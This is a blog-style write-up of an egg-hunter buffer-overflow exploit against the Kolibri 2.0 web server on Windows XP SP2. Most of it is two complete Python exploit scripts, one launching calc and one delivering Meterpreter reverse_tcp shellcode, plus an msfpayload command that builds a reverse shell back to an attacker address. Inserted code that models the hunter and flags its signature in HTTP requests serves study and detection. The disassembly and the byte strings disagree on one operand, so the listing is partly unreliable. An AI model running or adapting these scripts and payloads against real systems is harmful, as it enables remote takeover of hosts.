Egg Hunting Fun

Over this vacation I decided to learn how to use egg hunters in exploit development. This is a short write-up, put together right after I got my Meterpreter reverse_tcp shellcode to run. The original exploit, published in 2010, is at http://www.exploit-db.com/exploits/15834/. I wanted to implement an egg hunter that searches the heap, the stack and the rest of memory for our shellcode using a tag. Egg hunters are used when the available buffer space is limited.

Download the vulnerable Kolibri server: http://www.exploit-db.com/wp-content/themes/exploit/applications/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip

I assume you have a good knowledge of developing stack-based buffer overflow exploits, of registers, little-endianness and so on, which are the very basics.

I developed this exploit on Windows XP SP2, using USER32.dll, an operating system DLL, to find a jump to ESP (JMP ESP) instruction. The application itself doesn't use any DLLs of its own, so this is a platform-dependent exploit.

As I mentioned earlier, this is a very brief write-up. The offset is at 515 bytes. Our plan is to overwrite the EIP register with our JMP ESP address and then jump 60 bytes backwards to the start of our hunter so that it gets executed. The hunter then searches everywhere in memory for the tag and executes our shellcode. The opcode for a short jmp is EB, and 60 bytes back, i.e. -60, is C4, so the jump bytes are \xeb\xc4.

I will be using an egg hunter based on NtDisplayString. Our egg hunter is 32 bytes in size and, of course, the egg is 8 bytes.

6681CAFF0F  or dx,0x0fff
42          inc edx
52          push edx
6A43        push byte +0x43
58          pop eax
CD2E        int 0x2e
3C05        cmp al,0x5
5A          pop edx
74EF        jz 0x0
B86f736361  mov eax,0x6f736361; Our tag osca
8BFA        mov edi,edx
AF          scasd
75EA        jnz 0x5
AF          scasd
75E7        jnz 0x5
FFE7        jmp edi

So the bytes for the above egg hunter are:

"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8" + "osca" + "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
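To make the loop above concrete, here is a Python model of the hunter's search, added as an example and not taken from the post. It walks a constructed flat image the way the hunter walks the address space: the `readable` callback stands in for the NtDisplayString probe, a failed probe skips to the next 4 KB page, and only the doubled tag stops the search, which is why the single "osca" inside the hunter's own `mov eax` immediate does not match itself. `PAGE`, `hunt`, `build_image` and `page_1_unmapped` are my names.

```python
PAGE = 0x1000
TAG = b"osca"                 # the 4-byte tag loaded by "mov eax,0x6f736361"
EGG = TAG * 2                 # the 8-byte egg placed in front of the payload

# The 32 hunter bytes as listed in the post, so the image also carries the
# hunter's own single copy of the tag (inside the mov eax immediate).
HUNTER = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
          b"\xef\xb8" + TAG + b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")


def hunt(memory, readable, edx=0):
    """Model of the hunter's loop; returns (address jmp edi lands on, probes).
    memory   -- bytes, a constructed flat image standing in for address space
    readable -- callable(addr) -> bool; False models NtDisplayString returning
                STATUS_ACCESS_VIOLATION (al == 5) for an unmapped address
    """
    probes = 0
    edx = (edx | 0x0fff) + 1             # entry: or dx,0x0fff ; inc edx
    while edx + 8 <= len(memory):
        probes += 1                      # push edx ; push <syscall> ; pop eax ; int 0x2e
        if not readable(edx):
            edx = (edx | 0x0fff) + 1     # jz back to the top: skip the whole page
            continue
        # mov edi,edx ; scasd ; jnz ; scasd ; jnz -- both dwords must match
        if memory[edx:edx + 4] == TAG and memory[edx + 4:edx + 8] == TAG:
            return edx + 8, probes       # edi now points just past the egg: jmp edi
        edx += 1                         # jnz 0x5: inc edx and probe the next byte
    return None, probes


def page_1_unmapped(addr):
    """Constructed memory map: only the middle page of the image is unmapped."""
    return addr // PAGE != 1


def build_image():
    """Constructed 3-page image: hunter at 0x2100, egg and payload at 0x2345."""
    image = bytearray(3 * PAGE)
    image[0x2100:0x2100 + len(HUNTER)] = HUNTER
    egg_at = 0x2345
    image[egg_at:egg_at + 8] = EGG
    image[egg_at + 8:egg_at + 12] = b"\xcc" * 4   # stands in for the payload
    return bytes(image), egg_at


if __name__ == "__main__":
    image, egg_at = build_image()
    target, probes = hunt(image, page_1_unmapped)
    print("egg at %#x, jmp edi -> %#x after %d probes" % (egg_at, target, probes))
```

With page 1 unmapped the model needs one probe to discard that whole page, then steps byte by byte through page 2 past the lone tag at 0x2112 until both dwords match at 0x2345.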

This is my proof-of-concept exploit code, which launches the calculator.

#!/usr/bin/python

import socket
import os
import sys
egghunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x6f\x73" #os
"\x63\x61\x8b\xfa" #ca
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")

#Our tag for the egg hunter is "osca", which is \x6f\x73\x63\x61 in hex

shellcode=(
"\x89\xe6\xda\xc9\xd9\x76\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
"\x4c\x48\x68\x6d\x59\x55\x50\x33\x30\x37\x70\x43\x50\x4c\x49"
"\x38\x65\x46\x51\x6a\x72\x33\x54\x6c\x4b\x51\x42\x74\x70\x6e"
"\x6b\x51\x42\x36\x6c\x6e\x6b\x53\x62\x67\x64\x4e\x6b\x43\x42"
"\x54\x68\x46\x6f\x78\x37\x70\x4a\x34\x66\x34\x71\x6b\x4f\x35"
"\x61\x4b\x70\x6c\x6c\x67\x4c\x73\x51\x63\x4c\x74\x42\x34\x6c"
"\x75\x70\x39\x51\x78\x4f\x56\x6d\x43\x31\x48\x47\x58\x62\x58"
"\x70\x32\x72\x32\x77\x6c\x4b\x50\x52\x52\x30\x6e\x6b\x30\x42"
"\x57\x4c\x46\x61\x58\x50\x4e\x6b\x33\x70\x30\x78\x6d\x55\x59"
"\x50\x30\x74\x32\x6a\x35\x51\x6e\x30\x76\x30\x6e\x6b\x63\x78"
"\x56\x78\x4c\x4b\x63\x68\x75\x70\x56\x61\x59\x43\x78\x63\x55"
"\x6c\x72\x69\x6c\x4b\x74\x74\x4e\x6b\x73\x31\x6a\x76\x54\x71"
"\x49\x6f\x46\x51\x39\x50\x6c\x6c\x59\x51\x6a\x6f\x76\x6d\x47"
"\x71\x7a\x67\x70\x38\x59\x70\x34\x35\x79\x64\x54\x43\x31\x6d"
"\x58\x78\x75\x6b\x31\x6d\x37\x54\x51\x65\x6d\x32\x43\x68\x4c"
"\x4b\x72\x78\x44\x64\x65\x51\x39\x43\x43\x56\x6e\x6b\x64\x4c"
"\x32\x6b\x6c\x4b\x56\x38\x57\x6c\x47\x71\x58\x53\x4c\x4b\x56"
"\x64\x6c\x4b\x37\x71\x78\x50\x4e\x69\x33\x74\x76\x44\x37\x54"
"\x31\x4b\x61\x4b\x43\x51\x31\x49\x70\x5a\x56\x31\x6b\x4f\x39"
"\x70\x71\x48\x71\x4f\x62\x7a\x4e\x6b\x62\x32\x7a\x4b\x4b\x36"
"\x33\x6d\x61\x7a\x35\x51\x4c\x4d\x6e\x65\x38\x39\x47\x70\x37"
"\x70\x33\x30\x46\x30\x33\x58\x76\x51\x4c\x4b\x62\x4f\x6c\x47"
"\x79\x6f\x58\x55\x4d\x6b\x68\x70\x6e\x55\x79\x32\x66\x36\x71"
"\x78\x39\x36\x5a\x35\x4f\x4d\x6f\x6d\x39\x6f\x38\x55\x65\x6c"
"\x63\x36\x33\x4c\x66\x6a\x4d\x50\x49\x6b\x49\x70\x34\x35\x64"
"\x45\x4d\x6b\x47\x37\x47\x63\x73\x42\x62\x4f\x30\x6a\x73\x30"
"\x72\x73\x79\x6f\x79\x45\x43\x53\x53\x51\x52\x4c\x32\x43\x76"
"\x4e\x35\x35\x31\x68\x72\x45\x75\x50\x41\x41")

junk = "A"*478
esp = "\x01\xaa\xd5\x77" #0x77 d5 aa 01 - USER32.dll
extra = "A"*5
jmp = "\xEB\xc4"

exploit = junk + egghunter + extra + esp + jmp
payload = "oscaosca" + shellcode

buffer = (
"HEAD /" + exploit + " HTTP/1.1\r\n"
"Host: 192.168.111.128:8080\r\n"
"User-Agent: " + payload + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8080)) #To exploit this locally use localhost; if not, use the external IP and port 8080 🙂
s.send(buffer)
s.close()


As the screenshot showed, we were able to get remote code execution using our egg hunter 🙂
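From the defender's side, the request built above has several traits that a proxy or IDS can pick out. The following inspector is an added example, not part of the original post: it flags an oversized request-target, raw machine code bytes in the request line, the hunter's fixed first eight bytes, and the doubled egg or an oversized value in a header. `HUNTER_PREFIX`, `MAX_TARGET`, `MAX_HEADER` and both sample requests are my own constructions; the suspect sample keeps the shape of the post's request but uses filler in place of the real hunter body and payload.

```python
# First eight bytes of the hunter listed in the post (or dx,0x0fff ; inc edx ;
# push edx ; push <syscall>): a stable byte signature for this hunter variant.
HUNTER_PREFIX = b"\x66\x81\xca\xff\x0f\x42\x52\x6a"
EGG = b"osca" * 2         # the doubled tag the post's payload starts with
MAX_TARGET = 256          # assumed sane request-target length for a small server
MAX_HEADER = 512          # assumed sane header value length


def inspect(request):
    """Return a list of findings for one raw HTTP request given as bytes."""
    findings = []
    head = request.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) >= 2:
        target = parts[1]
        if len(target) > MAX_TARGET:
            findings.append("oversized request-target (%d bytes)" % len(target))
        # machine code and return addresses are not printable ASCII
        if any(not 0x20 <= c <= 0x7e for c in target):
            findings.append("non-printable bytes in request line")
    if HUNTER_PREFIX in request:
        findings.append("egg hunter signature")
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        name, value = name.decode("ascii", "replace"), value.strip()
        if EGG in value:
            findings.append("doubled egg in header %s" % name)
        if len(value) > MAX_HEADER:
            findings.append("oversized header %s (%d bytes)" % (name, len(value)))
    return findings


# Constructed samples: a normal request, and one with the shape of the post's
# request but with filler in place of the real hunter body and payload.
BENIGN = (b"HEAD /index.html HTTP/1.1\r\n"
          b"Host: 127.0.0.1:8080\r\n"
          b"User-Agent: Mozilla/5.0\r\n\r\n")
SUSPECT = (b"HEAD /" + b"A" * 478 + HUNTER_PREFIX + b"A" * 29 + b" HTTP/1.1\r\n"
           b"Host: 127.0.0.1:8080\r\n"
           b"User-Agent: " + EGG + b"P" * 700 + b"\r\n"
           b"Connection: keep-alive\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, inspect(req))
```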

Okay, time to get a reverse shell and own the system 😉 I will be using a Meterpreter reverse_tcp shellcode, as it is fairly fast and gives more options inside Metasploit than a traditional connect-back shell.

msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.100 lport=4444 R | msfencode -e x86/alpha_mixed -t c

This is our final exploit with the reverse shell.


#!/usr/bin/python

import socket
import os
import sys

print """
\t-----------------------------------------
\t\033[39m+ Kolibri Web Server Egg Hunter Exploit +
\t\033[37m+ Exploit Developed for Windows XP SP2 +
\t\033[31m+ JMP ESP from USER32.dll +
\t\033[37m+ Exploit Developed by Osanda Malith +
\t------------------------------------------
"""
egghunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x6f\x73" #os
"\x63\x61\x8b\xfa" #ca
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")

#Our tag for the egg hunter is "osca", which is \x6f\x73\x63\x61 in hex

shellcode=(
"\x89\xe0\xd9\xe8\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x6b\x4c\x4b\x58\x4c\x49\x35\x50\x65\x50\x65\x50\x33\x50\x4c"
"\x49\x38\x65\x64\x71\x6a\x72\x51\x74\x4e\x6b\x61\x42\x64\x70"
"\x4e\x6b\x56\x32\x36\x6c\x6c\x4b\x76\x32\x55\x44\x4c\x4b\x72"
"\x52\x55\x78\x46\x6f\x4d\x67\x33\x7a\x34\x66\x54\x71\x4b\x4f"
"\x30\x31\x69\x50\x4c\x6c\x45\x6c\x30\x61\x31\x6c\x45\x52\x56"
"\x4c\x47\x50\x6b\x71\x38\x4f\x66\x6d\x63\x31\x79\x57\x58\x62"
"\x6c\x30\x71\x42\x31\x47\x4e\x6b\x36\x32\x36\x70\x4e\x6b\x30"
"\x42\x57\x4c\x57\x71\x78\x50\x6c\x4b\x77\x30\x74\x38\x4e\x65"
"\x6b\x70\x34\x34\x31\x5a\x66\x61\x48\x50\x36\x30\x6c\x4b\x73"
"\x78\x34\x58\x4c\x4b\x61\x48\x71\x30\x65\x51\x6e\x33\x78\x63"
"\x75\x6c\x30\x49\x6c\x4b\x74\x74\x6e\x6b\x37\x71\x59\x46\x46"
"\x51\x49\x6f\x35\x61\x6f\x30\x4c\x6c\x6a\x61\x5a\x6f\x44\x4d"
"\x73\x31\x6a\x67\x36\x58\x6d\x30\x73\x45\x59\x64\x35\x53\x61"
"\x6d\x4c\x38\x55\x6b\x73\x4d\x57\x54\x62\x55\x5a\x42\x46\x38"
"\x4c\x4b\x51\x48\x37\x54\x73\x31\x59\x43\x71\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x72\x78\x45\x4c\x76\x61\x78\x53\x4c\x4b"
"\x33\x34\x6e\x6b\x67\x71\x4e\x30\x4e\x69\x43\x74\x51\x34\x57"
"\x54\x43\x6b\x33\x6b\x53\x51\x72\x79\x53\x6a\x33\x61\x6b\x4f"
"\x49\x70\x70\x58\x43\x6f\x53\x6a\x6e\x6b\x54\x52\x68\x6b\x4f"
"\x76\x73\x6d\x43\x58\x37\x43\x34\x72\x65\x50\x77\x70\x52\x48"
"\x74\x37\x54\x33\x74\x72\x31\x4f\x51\x44\x70\x68\x32\x6c\x64"
"\x37\x34\x66\x46\x67\x6b\x4f\x48\x55\x6c\x78\x4e\x70\x47\x71"
"\x77\x70\x73\x30\x74\x69\x7a\x64\x36\x34\x52\x70\x53\x58\x35"
"\x79\x6f\x70\x50\x6b\x57\x70\x79\x6f\x78\x55\x72\x70\x46\x30"
"\x46\x30\x42\x70\x73\x70\x62\x70\x63\x70\x66\x30\x51\x78\x68"
"\x6a\x76\x6f\x59\x4f\x39\x70\x39\x6f\x38\x55\x4a\x37\x32\x4a"
"\x46\x65\x71\x78\x59\x50\x79\x38\x37\x71\x52\x44\x42\x48\x33"
"\x32\x37\x70\x52\x31\x51\x4c\x4e\x69\x5a\x46\x30\x6a\x54\x50"
"\x46\x36\x73\x67\x31\x78\x4f\x69\x49\x35\x43\x44\x65\x31\x69"
"\x6f\x4e\x35\x4e\x65\x4f\x30\x51\x64\x64\x4c\x39\x6f\x72\x6e"
"\x75\x58\x63\x45\x7a\x4c\x63\x58\x6a\x50\x6f\x45\x69\x32\x72"
"\x76\x6b\x4f\x38\x55\x50\x6a\x77\x70\x73\x5a\x33\x34\x30\x56"
"\x62\x77\x73\x58\x44\x42\x6e\x39\x59\x58\x53\x6f\x6b\x4f\x6e"
"\x35\x6c\x4b\x47\x46\x51\x7a\x33\x70\x71\x78\x53\x30\x64\x50"
"\x43\x30\x67\x70\x42\x76\x70\x6a\x47\x70\x35\x38\x61\x48\x6f"
"\x54\x63\x63\x4a\x45\x59\x6f\x5a\x75\x4a\x33\x71\x43\x62\x4a"
"\x45\x50\x52\x76\x70\x53\x46\x37\x33\x58\x75\x52\x5a\x79\x6a"
"\x68\x61\x4f\x69\x6f\x7a\x75\x35\x51\x78\x43\x37\x59\x49\x56"
"\x4e\x65\x4a\x56\x74\x35\x6a\x4c\x69\x53\x41\x41")

junk = "A"*478
esp = "\x01\xaa\xd5\x77" #0x77 d5 aa 01 - USER32.dll
extra = "A"*5
jmp = "\xEB\xc4"
#jmp = "\xcc" + "\xEB\xc4" #debugging variant: int3 breakpoint before the jump

exploit = junk + egghunter + extra + esp + jmp
payload = "oscaosca" + shellcode

buffer = (
"HEAD /" + exploit + " HTTP/1.1\r\n"
"Host: 172.16.71.135:8080\r\n"
"User-Agent: " + payload + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

try:
 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 s.connect(('172.16.71.135', 8080)) #To exploit this locally use localhost; if not, use the external IP and port 8080 🙂
 print '[+] Sending Evil Payload'
 s.send(buffer)
 s.close()
 print '\033[33m[+] Successfully Exploited the Buffer Overflow'

except:
 print "[-] Can't send evil buffer"
 sys.exit(0)


That's it, we are in 🙂 Here is the output of the cool screenshot command of our Meterpreter shell on our Windows XP machine.


Egg hunting is fun, isn't it? It took me about an hour to figure out the theory and develop this exploit from scratch. You could also give it a try by reading my example code. I am sorry that I haven't explained everything from the beginning, but this is just a small write-up for people who are already in this field. I will surely start writing detailed articles on exploit development if I get some more free time. Exploit development really needs lots of patience 😉

I made a quick video to celebrate after getting a nice little shell ^_^

Here is a good research paper by skape about egg hunting: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

As always, respect to Peter Van Eeckhoutte (corelanc0d3r) for his tutorials and exploits.
